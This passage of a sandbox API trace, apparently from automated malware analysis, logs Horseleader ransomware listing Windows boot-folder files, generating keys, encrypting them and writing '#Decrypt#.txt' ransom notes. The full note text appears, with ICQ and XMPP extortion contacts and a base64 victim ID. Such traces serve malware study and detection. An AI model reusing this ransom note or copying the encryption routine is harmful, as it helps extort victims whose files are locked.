(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.820] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.820] CloseHandle (hObject=0x200) returned 1 [0121.821] GetProcessHeap () returned 0x780000 [0121.821] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.821] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0121.821] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0121.821] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0121.821] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0121.821] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0121.821] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.821] GetProcessHeap () returned 0x780000 [0121.821] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.822] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0121.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.822] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0121.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.823] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.823] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.823] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0121.823] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.823] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.823] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.823] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.823] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0121.823] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.824] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.824] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.824] lstrlenW (lpString=".testttjffg") returned 11 [0121.824] StrStrW (lpFirst="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.824] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.824] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.824] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.825] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.825] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.825] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\#Decrypt#.txt") returned 31 [0121.825] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\#Decrypt#.txt" (normalized: "c:\\boot\\hu-hu\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.826] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.826] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.827] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.827] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.827] CloseHandle (hObject=0x200) returned 1 [0121.828] GetProcessHeap () returned 0x780000 [0121.828] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.828] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="it-IT", cAlternateFileName="")) returned 1 [0121.828] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0121.828] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0121.828] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0121.828] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0121.829] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.829] GetProcessHeap () returned 0x780000 [0121.829] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.829] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0121.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.870] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.870] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0121.870] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.871] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.871] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.871] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0121.871] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.871] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.871] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.871] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.871] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0121.872] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.872] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.872] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.872] lstrlenW (lpString=".testttjffg") returned 11 [0121.872] StrStrW (lpFirst="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.872] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.872] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.873] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.873] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.873] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\#Decrypt#.txt") returned 31 [0121.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\#Decrypt#.txt" (normalized: "c:\\boot\\it-it\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0121.874] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.874] WriteFile (in: hFile=0x150, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.876] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.876] WriteFile (in: hFile=0x150, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.876] CloseHandle (hObject=0x150) returned 1 [0121.876] GetProcessHeap () returned 0x780000 [0121.877] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.877] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0121.877] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0121.877] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0121.877] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0121.877] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0121.877] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.878] GetProcessHeap () returned 0x780000 [0121.878] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.878] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0121.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.879] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.879] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0121.879] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.879] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.879] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.879] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0121.879] 